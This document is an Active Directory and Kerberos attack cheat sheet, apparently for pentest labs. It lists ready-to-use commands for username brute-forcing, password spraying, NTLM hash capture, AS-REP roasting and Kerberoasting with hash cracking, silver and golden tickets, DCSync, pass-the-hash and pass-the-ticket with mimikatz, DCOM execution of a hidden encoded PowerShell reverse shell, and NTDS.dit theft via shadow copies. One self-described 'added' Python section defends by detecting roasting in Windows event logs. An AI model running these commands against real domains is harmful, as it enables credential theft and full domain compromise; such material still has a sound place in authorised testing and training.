Kerberos (88)

What is Kerberos?

Username Bruteforce

Wordlist: https://github.com/insidetrust/statistically-likely-usernames

kerbrute userenum -d example.local --dc 192.168.1.1 john.smith.txt -o output.txt

Password Spraying

kerbrute passwordspray -d example.local --dc 192.168.1.1 valid_users.txt 'Password123'

Capture NTLM Hash

responder -I eth0

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt 

AS-REP Roasting

impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete
.\Rubeus.exe asreproast /nowrap

hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Kerberoasting

This technique requires valid credentials for a user account in the domain.

# Attacker
impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.local/pete -outputfile hashes.kerberoast
# Local
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast

hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
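The AS-REP Roasting and Kerberoasting sections above both leave traces on the domain controller: AS-REP roasting shows up as a 4768 (TGT request) event with PreAuthType 0, and Kerberoasting as a burst of 4769 (service ticket request) events from one account with TicketEncryptionType 0x17 (RC4-HMAC) for many distinct service accounts. The following Python is an added detection example, not part of the original cheat sheet; it assumes the Security log events have already been parsed into dicts keyed by the standard Windows field names, the event records are constructed for this example, and the threshold of three distinct service accounts is an assumed tuning value.

```python
"""Flag AS-REP roasting and Kerberoasting indicators in parsed Windows
Security events (4768 / 4769). Sample records below are constructed."""
from collections import defaultdict

RC4_HMAC = "0x17"      # TicketEncryptionType for RC4-HMAC; AES is 0x11 / 0x12
NO_PREAUTH = "0"       # PreAuthType 0 on a 4768 = TGT issued without pre-auth
SPN_THRESHOLD = 3      # assumed: distinct RC4 service accounts per user before alerting

# Constructed sample events (field names as in the Windows Security log).
SAMPLE_EVENTS = [
    # ordinary AES service ticket to a machine account
    {"EventID": "4769", "TargetUserName": "alice@CORP.COM", "ServiceName": "FILES04$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.0.2.10"},
    # one user requesting RC4 tickets for several service accounts in a row
    {"EventID": "4769", "TargetUserName": "pete@CORP.COM", "ServiceName": "iis_service",
     "TicketEncryptionType": RC4_HMAC, "IpAddress": "::ffff:192.0.2.55"},
    {"EventID": "4769", "TargetUserName": "pete@CORP.COM", "ServiceName": "sql_svc",
     "TicketEncryptionType": RC4_HMAC, "IpAddress": "::ffff:192.0.2.55"},
    {"EventID": "4769", "TargetUserName": "pete@CORP.COM", "ServiceName": "backup_svc",
     "TicketEncryptionType": RC4_HMAC, "IpAddress": "::ffff:192.0.2.55"},
    {"EventID": "4769", "TargetUserName": "pete@CORP.COM", "ServiceName": "FILES04$",
     "TicketEncryptionType": RC4_HMAC, "IpAddress": "::ffff:192.0.2.55"},
    # a single RC4 ticket: below threshold, not alerted on its own
    {"EventID": "4769", "TargetUserName": "bob@CORP.COM", "ServiceName": "sql_svc",
     "TicketEncryptionType": RC4_HMAC, "IpAddress": "::ffff:192.0.2.20"},
    # TGT issued with no pre-authentication (AS-REP roastable account)
    {"EventID": "4768", "TargetUserName": "dave", "ServiceName": "krbtgt",
     "TicketEncryptionType": RC4_HMAC, "PreAuthType": NO_PREAUTH,
     "IpAddress": "::ffff:192.0.2.55"},
    # normal TGT request with pre-authentication
    {"EventID": "4768", "TargetUserName": "alice", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "PreAuthType": "2", "IpAddress": "::ffff:192.0.2.10"},
]


def asrep_roast_candidates(events):
    """Return (user, source IP) pairs for TGTs issued without pre-authentication."""
    return [
        (e["TargetUserName"], e["IpAddress"])
        for e in events
        if e.get("EventID") == "4768" and e.get("PreAuthType") == NO_PREAUTH
    ]


def kerberoast_candidates(events, threshold=SPN_THRESHOLD):
    """Return {requesting user: sorted service accounts} for users that requested
    RC4 service tickets to at least `threshold` distinct non-machine accounts.
    Machine accounts (name ends with '$') and krbtgt are excluded: their keys
    are long and random, so tickets for them are not crackable targets."""
    rc4_services = defaultdict(set)
    for e in events:
        if e.get("EventID") != "4769" or e.get("TicketEncryptionType") != RC4_HMAC:
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        rc4_services[e["TargetUserName"]].add(svc)
    return {u: sorted(s) for u, s in rc4_services.items() if len(s) >= threshold}


if __name__ == "__main__":
    print("AS-REP roasting indicators:", asrep_roast_candidates(SAMPLE_EVENTS))
    print("Kerberoasting indicators:", kerberoast_candidates(SAMPLE_EVENTS))
```

The RC4 filter is the key heuristic: tools request RC4 tickets by default because RC4 hashes crack far faster than AES, so a domain that has AES enabled everywhere makes 0x17 tickets rare and easy to alert on. PreAuthType 0 on a 4768 is conclusive on its own, since it identifies exactly the accounts with "Do not require Kerberos preauthentication" set.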

Silver Ticket

iwr -UseDefaultCredentials http://web04 # We get a 401

./mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
# look for the NTLM hash of the account running the service
whoami /user # get the domain SID

kerberos::golden /sid:xxxxxxxxxxxxxxxx /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:xxxxxxxxxxxxxxxxx /user:jeffadmin
klist
iwr -UseDefaultCredentials http://web04 | Select-Object -Expand Content # 200 OK

DCSync

.\mimikatz.exe
lsadump::dcsync /user:corp\Administrator

impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"Password123"@192.168.50.70 -outputfile hashes.dcsync

hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Overpass The Hash

./mimikatz
privilege::debug
sekurlsa::logonpasswords # find the NTLM hash of a privileged user
sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell
net use \\files04 # connect to the target host so a Kerberos ticket is requested
klist # check the Kerberos tickets
.\PsExec.exe \\files04 cmd # open cmd using the ticket

Pass The Ticket

ls \\web04\backup # 403

./mimikatz
privilege::debug
sekurlsa::tickets /export
dir *.kirbi
kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi
klist

ls \\web04\backup # 200

DCOM

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.50.73"))

$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e base64_rev","7")

Golden Ticket Persistence

./mimikatz
privilege::debug
lsadump::lsa /patch # must include the krbtgt account's NTLM hash
kerberos::purge
kerberos::golden /user:jen /domain:corp.com /sid:S-1-5-21-1987370270-658905905-1781884369 /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt
misc::cmd
PsExec.exe \\dc1 cmd.exe

Shadow Copy Persistence

vshadow.exe -nw -p C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak
reg.exe save hklm\system c:\system.bak

impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL
